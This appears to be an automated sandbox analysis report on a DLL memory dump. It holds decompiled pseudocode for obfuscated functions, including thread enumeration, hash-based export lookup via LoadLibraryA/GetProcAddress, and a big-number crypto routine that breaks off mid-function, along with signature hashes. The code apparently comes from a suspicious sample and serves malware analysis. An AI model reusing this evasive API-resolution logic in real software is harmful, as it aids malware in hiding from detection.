API String ID: 544645111-0
Opcode ID: 64505bf566dfe937b73935f2a31921d73d1ed09c2cf3971bf7e4e9239d9e6538
Instruction ID: 00e3823af627b13cdf9017a58722e17e96540dbe4280097b9afc6cfa1c7ed3f7
Opcode Fuzzy Hash: 64505bf566dfe937b73935f2a31921d73d1ed09c2cf3971bf7e4e9239d9e6538
Instruction Fuzzy Hash: 8BC16B79804979CFE784CFBACEE417EBBF1FB88315B44812AD5A0922A5D7386140DF18

Uniqueness

Uniqueness Score: -1.00%

Function 1001B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B1B0(intOrPtr _a4) {
				void* _t5;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t13 = _t8;
				if(_t8 == 0) {
					__eflags = 0;
					return 0;
				}
				_t5 = E10009D50(0xfef6f706);
				E1000BF50(_t13, 0, 0x8685de3);
				_t7 = RtlAllocateHeap( *0x10022124, 0, _t8 + _t5 + 0x657d085a); // executed
				return _t7;
			}

0x1001b1b4
0x1001b1b7
0x1001b1b9
0x1001b1eb
0x00000000
0x1001b1eb
0x1001b1c0
0x1001b1d6
0x1001b1e7
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 1001B1E7

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: beb2a632c2b5f30955fc39f83be38502857d1d012741bf0014ee5481d7a4210e
Instruction ID: ee99622714df84011d91cf051c4ef1c65a325d8703d0cc6a259ead72f2d02243
Opcode Fuzzy Hash: beb2a632c2b5f30955fc39f83be38502857d1d012741bf0014ee5481d7a4210e
Instruction Fuzzy Hash: 4AE0CD3394453477D611A6D4AC63F573788CF057A1F520120FE0CA7155D551B61086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100169A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100169A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E10009D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E100055C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E100055C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x100169b2
0x100169c1
0x100169ca
0x100169d9
0x100169de
0x100169e3
0x10016a25
0x10016a25
0x100169eb
0x100169eb
0x100169ef
0x100169f0
0x100169ff
0x10016a04
0x10016a11
0x10016a1d
0x10016a21
0x00000000
0x00000000
0x10016a23
0x10016a21
0x00000000
0x10016a1d
0x00000000
0x100169f0
0x10016a27
0x10016a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 100169AD
GetCurrentProcessId.KERNEL32 ref: 100169C4
Thread32First.KERNEL32 ref: 100169D1
GetLastError.KERNEL32(00000000,?), ref: 100169F0
Thread32Next.KERNEL32 ref: 10016A16

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: 4c1b5959a6462728d3de41c231e198cdd4385b844a8da6baa9c01115eef6308b
Instruction ID: 0fe009aefc55ce659b99c4a36f4bd09f69e296f9482623871af596446088c887
Opcode Fuzzy Hash: 4c1b5959a6462728d3de41c231e198cdd4385b844a8da6baa9c01115eef6308b
Instruction Fuzzy Hash: BF01F7769403045BEB00E7A09CD6FFF3EACEF45255F840039F905AA153E935E9458572

Uniqueness

Uniqueness Score: -1.00%

Function 1000D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E100112D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E10009D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E10009D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E10001460(_t205, E10001460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E10001460(0,  ~( *_t143), _v40));
							E10001460(0,  *_t143, _a4);
							E10018F20( &_v140, E10009D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E1001D680(0, _t91);
									_t176 = _t176 - E100022E0(0, 0, 1);
									E10001460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E100100A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E10001460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E10009D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E100022E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E10001460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E10007DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E10001460(__eflags, E100022E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E10001460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E10001460(__eflags, _t137, E10009D50(0x3638cbc4));
										E10001460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E10007DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E10009D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E10007DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E10007DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E100055A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x1000d839
0x1000d83c
0x1000d83e
0x1000d840
0x1000d847
0x1000d852
0x1000d854
0x1000d85b
0x1000d860
0x1000d862
0x1000d865
0x1000d86d
0x1000d873
0x1000d873
0x1000d880
0x1000d894
0x1000d89f
0x1000d8af
0x1000d8b4
0x1000d8bb
0x1000d8be
0x1000d8c4
0x1000d8cc
0x1000d8d0
0x1000d8d2
0x1000d8d5
0x1000d8ea
0x1000d8f0
0x1000d90d
0x1000d912
0x1000d915
0x1000d919
0x1000d91b
0x1000d920
0x1000d92c
0x1000d942
0x1000d944
0x1000d949
0x1000d94c
0x1000d950
0x1000d920
0x1000d954
0x1000d95d
0x1000d962
0x1000d968
0x1000d98d
0x1000d9c4
0x1000d9d0
0x1000d9d8
0x1000d9db
0x1000d9e0
0x1000d9e5
0x1000d9e7
0x1000d9ea
0x1000d9ec
0x1000d9f2
0x1000d9fc
0x1000d9fe
0x1000da06
0x1000da0e
0x1000da11
0x1000da16
0x1000da19
0x1000da1c
0x1000da1e
0x1000da20
0x1000da22
0x1000da24
0x1000da24
0x1000da2c
0x1000da30
0x1000da30
0x1000da45
0x1000da51
0x1000da56
0x1000da5b
0x1000da61
0x1000da65
0x1000da68
0x1000da68
0x1000da30
0x1000da83
0x1000da88
0x1000da9a
0x1000daaa
0x1000dab1
0x1000dabe
0x1000dac8
0x1000dad7
0x1000dae5
0x1000daec
0x1000daf3
0x1000daf6
0x1000db05
0x1000db0c
0x1000db11
0x1000db14
0x1000db16
0x1000db54
0x1000db18
0x1000db1e
0x1000db21
0x1000db23
0x1000db59
0x1000db25
0x1000db25
0x1000db30
0x1000db35
0x1000db3a
0x1000db44
0x1000db47
0x1000db4a
0x1000db4b
0x1000db4b
0x1000db4f
0x1000db4f
0x1000db23
0x1000db70
0x1000db70
0x1000d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d96a
0x1000d973
0x1000d974
0x1000d977
0x1000d97a
0x1000d983
0x1000d983
0x1000d86d
0x1000db72
0x1000db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 1000DB62
GetProcAddress.KERNEL32(00000000,?), ref: 1000DB6A

Strings

l, xrefs: 1000DAC8
d, xrefs: 1000DAB1

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: 3dbf186531431f3ce4e4705a105d575cd3225cb16c0bcfc2a6d7af16a4422eff
Instruction ID: f19e173603530f73e5cfbe55c89d73ba16b55693ee925dd9cbffc8a3de74c59a
Opcode Fuzzy Hash: 3dbf186531431f3ce4e4705a105d575cd3225cb16c0bcfc2a6d7af16a4422eff
Instruction Fuzzy Hash: 31912ABAD002159BEB10DFB49C42AFE77B4EF16398F050065FC49B7356E631AA0487B2

Uniqueness

Uniqueness Score: -1.00%

Function 10001A00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x100220d8; // 0x44c466c0
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x10001a06
0x10001a0c
0x10001a15
0x10001a1d
0x10001a39
0x10001a47

APIs

CreateDialogParamW.USER32 ref: 10001A1D
GetVersion.KERNEL32(?,10008614,0000031F,?,10006AB1,?,1000AE51), ref: 10001A39

Strings

`:Aw KAw, xrefs: 10001A1D

Memory Dump Source

Source File: 00000000.00000002.295098995.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.295095529.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295114450.0000000010020000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295122133.0000000010022000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295128339.0000000010025000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogParamVersion
String ID: `:Aw KAw
API String ID: 1068622756-3453105948
Opcode ID: 34eaa41a4b4c1273736ba0f7d6b8cb7eb65305335a1702d28b7c4d841133df7d
Instruction ID: 50f6ff628264fb58662a167b14d2c5c2d8b64eb92a0fc4921ead4ff2949ec5b8
Opcode Fuzzy Hash: 34eaa41a4b4c1273736ba0f7d6b8cb7eb65305335a1702d28b7c4d841133df7d
Instruction Fuzzy Hash: CAE092236036386BE2108AAF9CC4C97FF9CDE425AA3520227FA4CD36A2D1104C0986F4

Uniqueness

Uniqueness Score: -1.00%

Function 1001DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1001DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
				unsigned int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				void* _t304;
				signed int _t305;
				signed int _t309;
				void* _t311;
				signed int _t314;
				signed int _t317;
				signed int* _t319;
				signed int _t328;
				signed int _t329;
				void* _t331;
				void* _t336;
				void* _t338;
				void* _t344;
				intOrPtr _t347;
				void* _t355;
				signed int _t358;
				void* _t360;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t376;
				signed int* _t377;
				signed int _t379;
				signed int _t380;
				void* _t383;
				signed int _t387;
				void* _t396;
				void* _t401;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				intOrPtr _t414;
				void* _t415;
				signed int _t418;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed char _t427;
				signed int _t432;
				intOrPtr _t434;
				signed char _t444;
				signed int _t445;
				intOrPtr _t450;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int* _t461;
				signed int* _t463;
				signed int _t464;
				signed int _t465;
				signed int* _t466;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t475;
				signed int* _t476;
				signed int _t478;
				signed int _t479;
				signed int _t481;
				signed int* _t484;
				unsigned int _t486;
				unsigned int _t490;
				signed int _t491;
				intOrPtr _t492;
				signed int _t495;
				signed int _t498;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed char _t507;
				intOrPtr* _t510;
				signed int _t525;
				signed int _t527;
				signed int _t532;
				signed int _t533;
				signed int _t542;
				signed int _t543;
				intOrPtr _t549;
				intOrPtr* _t551;
				signed int _t552;
				void* _t566;
				signed int _t569;
				signed int _t570;
				signed int* _t576;
				signed int _t581;
				signed int _t582;
				signed int* _t584;
				signed int _t586;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				void* _t600;
				void* _t602;
				void* _t604;
				void* _t606;
				void* _t621;
				void* _t629;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t635;

				_t532 = __edx;
				_t455 = _a12;
				_t584 = E1001EC10();
				_v28 = E1001EC10();
				_t549 = E1001EC10();
				_v68 = E1001EC10();
				_v40 = E1001EC10();
				_v80 = E1001EC10();
				_t304 = E1001E3C0(__ecx, __eflags, _a12, _a16);
				_t602 = _t600 - 0x70 + 8;
				if(_t304 == 0) {
					_t305 = E1001EBE0(_t455);
					_t602 = _t602 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_v64 = _t549;
						_v52 = _t584;
						_t457 =  *_a16;
						__eflags = _t457 - 1;
						if(__eflags != 0) {
							_v24 =  *_a12;
							_t490 = E10001460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
							_t309 = _a4;
							_v44 = _t457;
							_v20 = _t490;
							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
							_t311 = E100022E0(__eflags, _t56, _t457);
							_t604 = _t602 + 0x10;
							_t459 = _t311 + 0xc20bc3c9;
							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
								_t432 = _a4;
								_t581 = _t432;
								 *(_t432 + 4) = _t459;
								_t434 = E10003F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
								_t604 = _t604 + 8;
								 *((intOrPtr*)(_t581 + 8)) = _t434;
							}
							_t551 = _v28;
							E10007D70(_a12, _t551);
							E10007D70(_a16, _t584);
							_t606 = _t604 + 0x10;
							_t314 =  *_t584;
							_t491 = _t584[2];
							_v32 = _t459;
							__eflags =  *(_t491 + _t314 * 4 - 4);
							if( *(_t491 + _t314 * 4 - 4) < 0) {
								_v56 = 0;
								_t460 = 1;
								goto L25;
							} else {
								_t525 = 0;
								__eflags = 0;
								_t481 = 1;
								do {
									_v56 = (_t525 << 0x00000020 | _t481) << 1;
									_v60 = _t481 + _t481;
									E1001E320(_t584, 0x10022028);
									_t425 = E10001460(__eflags, E10009D50(0xfa78285f) +  *_t584, 0xffffffff);
									_t426 = E10009D50(0xfa78285f);
									_t481 = _v60;
									_t427 = E10006BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
									_t525 = _v56;
									_t606 = _t606 + 0x20;
									__eflags = _t427 & 0x00000001;
								} while ((_t427 & 0x00000001) != 0);
								__eflags = _t481 | _t525;
								if((_t481 | _t525) == 0) {
									_t551 = _v28;
									_t460 = 0;
									__eflags = 0;
									_v56 = 0;
								} else {
									E1001E610(_v64, _t481);
									_t551 = _v28;
									E1001E320(_t551, _v64);
									_t606 = _t606 + 0x10;
								}
								L25:
								_t492 =  *_t551;
								__eflags = _t492 - _v20;
								if(_t492 != _v20) {
									_t576 = _v28;
									_t418 = _t492 + 1;
									 *_t576 = _t418;
									__eflags = _t492 - _t576[1];
									if(_t492 >= _t576[1]) {
										_t576[1] = _t418;
										__eflags = _t418 << 2;
										_t421 = E10003F90(_t576[2], _t418 << 2);
										_t606 = _t606 + 8;
										_t576[2] = _t421;
									}
									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
								}
								_v60 = _t460;
								_t461 = _v28;
								__eflags = _v32;
								if(__eflags <= 0) {
									L53:
									_t317 = _a4;
									_t533 = _t317;
									_t495 =  *_a12 -  *_a16;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
									asm("sbb ecx, 0xffffffff");
									 *_t533 = _t495;
									_t586 =  *_t461;
									__eflags = _t586;
									if(_t586 <= 0) {
										__eflags = 0;
										L58:
										_t319 = _v28;
										 *_t319 = 0;
										_t463 = _t319;
										E10007D70(_t319, _a8);
										_t584 = _v52;
										_t549 = _v64;
										L6:
										_push(_t549);
										E1001EBC0();
										_push(_v68);
										E1001EBC0();
										_push(_v40);
										E1001EBC0();
										_push(_t463);
										E1001EBC0();
										_push(_t584);
										E1001EBC0();
										_push(_v80);
										return E1001EBC0();
									}
									_t464 = 0;
									_v24 = _t461[2];
									_t328 = 0;
									__eflags = 0;
									do {
										_t552 = _v24;
										_v32 =  *(_t552 + _t586 * 4 - 4);
										_t329 = E10013860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
										__eflags = _t329;
										 *(_t552 + _t586 * 4 - 4) = _t329;
										_t535 =  !=  ? _t586 : _t464;
										__eflags = _t464;
										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
										_t498 = _t533 * _v60;
										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
										_t331 = E10001A50(0, 0, _t329 * _v60, _t498 + _t533);
										_t606 = _t606 + 0x10;
										_t328 = _t331 + _v32;
										_t586 = _t586 - 1;
										__eflags = _t586;
									} while (_t586 > 0);
									goto L58;
								} else {
									_t465 = _v44;
									_v112 = E10001460(__eflags, _t465, 0xffffffff);
									_v96 = _t465 + 1;
									_v92 = 4 + _t465 * 4;
									_t336 = E10001460(__eflags, _v24, 0xa8f61def);
									_v20 = _v24 + 1;
									_t338 = E100022E0(__eflags, _v24 + 0x9ecacfc6, _t465);
									_v104 = E10009D50(0x5413097) + _t338;
									E100022E0(__eflags, _v20, _t465);
									_t344 = E100022E0(__eflags, E10001460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
									E10001460(__eflags, _t465, 1);
									_t621 = _t606 + 0x3c;
									_t466 = _v28;
									_v100 = _t465 + 0x18a13f73;
									_t347 = 0;
									_v88 = _t344 + 0x3baa12e3;
									_v108 = _t336 - _t465 + 0x5709e211;
									_t590 = _v32;
									do {
										_v120 = _t347;
										_v116 = _v108 - _t347;
										E10001460(__eflags, _t590, 0xffffffff);
										_v84 = _t590;
										_v36 =  *((intOrPtr*)(_t466 + 8));
										_v76 = E100022E0(__eflags, _v100 + _t590, 0x18a13f74);
										_v32 = _t590 - 1;
										E10001460(__eflags, _t590 - 1, _v44);
										_t355 = E100013C0(E100022E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
										_t502 = _v52[2];
										_t592 =  *(_t502 + _v112 * 4);
										_v72 = _t502;
										_t358 = E10013860(_t355, _t532, _t592, 0);
										__eflags = _t358 - 0xffffffff;
										_t503 = _t532;
										_v124 = _t592;
										asm("sbb edx, 0x0");
										_t538 =  <  ? _t503 : 0;
										_v20 =  <  ? _t503 : 0;
										_t540 =  <  ? _t358 : 0xffffffff;
										_v24 =  <  ? _t358 : 0xffffffff;
										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
										asm("adc ebx, 0x2892411f");
										_t360 = E10001A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
										_t471 = _t360 - E10002070(0xb6167735, 0xa7951915);
										asm("sbb esi, edx");
										_v48 = _t542;
										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
										__eflags = _v76 + 0x6e556da6;
										_t366 = E10001460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
										_t506 = _v20;
										_t629 = _t621 + 0x50;
										_t543 = _v36;
										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
										_t368 = _v24;
										while(1) {
											_v20 = _t506;
											_v24 = _t368;
											_t369 = E10003A30(_t368, _t506, _v72, 0);
											_v36 = _t543;
											_t507 = E10002070(0x6474008c, 0x8f07580a);
											_v76 = _t471;
											_t472 = _t471 << _t507;
											__eflags = _t507 & 0x00000020;
											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
											_t473 =  !=  ? 0 : _t472;
											_t474 = ( !=  ? 0 : _t472) | _v128;
											_t376 = E10002070(0x6474008c, 0x8f07580a);
											_t632 = _t629 + 0x20;
											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
											asm("sbb edi, [ebp-0x20]");
											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
												break;
											}
											_t415 = E10002070(0x393c8f08, 0xec16389c);
											_t569 = _t543;
											asm("adc edi, ecx");
											_t595 = _t415 + _v24 + 0xa2b7705b;
											asm("adc edi, 0x9cee9f69");
											E10001750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
											_t629 = _t632 + 0x18;
											_t368 = _t595;
											_t506 = _t569;
											_t471 = _v76 + _v124;
											__eflags = _t471;
											asm("adc dword [ebp-0x2c], 0x0");
											if(_t471 == 0) {
												continue;
											}
											L37:
											_t509 = _v80;
											_t475 = _v40;
											__eflags = _t569 - 1;
											asm("sbb edx, 0x0");
											_t377 =  *(_t509 + 8);
											 *_t377 = _t595;
											_t377[1] = _t569;
											 *_t509 = 2;
											E1001E690(_t569 - 1, _v68, _v52, _t509);
											_t633 = _t632 + 0xc;
											_t379 = _v44;
											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
												 *((intOrPtr*)(_t475 + 4)) = _v96;
												_t414 = E10003F90( *((intOrPtr*)(_t475 + 8)), _v92);
												_t633 = _t633 + 8;
												 *((intOrPtr*)(_t475 + 8)) = _t414;
												_t379 = _v44;
											}
											__eflags = _t379;
											 *_t475 = 0;
											if(__eflags < 0) {
												L44:
												_t476 = _v40;
												_t380 = E1001E3C0(_t509, __eflags, _t476, _v68);
												_t634 = _t633 + 8;
												__eflags = _t380;
												if(_t380 != 0) {
													E1001E380(_t476, _v52);
													_t401 = E10009D50(0x11f2bfb2);
													_t634 = _t634 + 0xc;
													_t595 = _t595 + _t401 - 0x7586bf1f;
												}
												E1001E650(_t476, _v68);
												_t635 = _t634 + 8;
												_t570 =  *_t476;
												__eflags = _t570;
												if(_t570 > 0) {
													_t478 = 0;
													__eflags = 1;
													_v36 = 1 - _v84;
													_v20 = _v40[2];
													_v48 = _v28[2];
													0;
													0;
													do {
														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
														_t396 = E100022E0(__eflags, 0, _t478);
														E10001460(__eflags, _t478, _v32);
														_t635 = _t635 + 0x10;
														_t478 = _t478 + 1;
														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
														_t570 =  *_v40;
														__eflags = _t478 - _t570;
													} while (__eflags < 0);
												}
												goto L49;
											} else {
												_t479 = 0;
												_v24 = _v28[2];
												_v20 = _v40[2];
												do {
													_t509 = _v24;
													_t408 =  *(_v24 + (_v32 + _t479) * 4);
													__eflags = _t408;
													 *(_v20 + _t479 * 4) = _t408;
													if(__eflags != 0) {
														_t412 = E100022E0(__eflags, 0, _t479);
														_t633 = _t633 + 8;
														_t509 = 1 - _t412;
														 *_v40 = 1 - _t412;
													}
													_t409 = E100022E0(__eflags, _t479, 0x19c77e59);
													_t410 = E10009D50(0x7db37ef5);
													E10001460(__eflags, _t479, 1);
													_t633 = _t633 + 0x14;
													__eflags = _t479 - _v44;
													_t479 = _t409 + _t410 + 1;
												} while (__eflags != 0);
												goto L44;
											}
										}
										_t595 = _v24;
										__eflags = _t376 & 0x00000020;
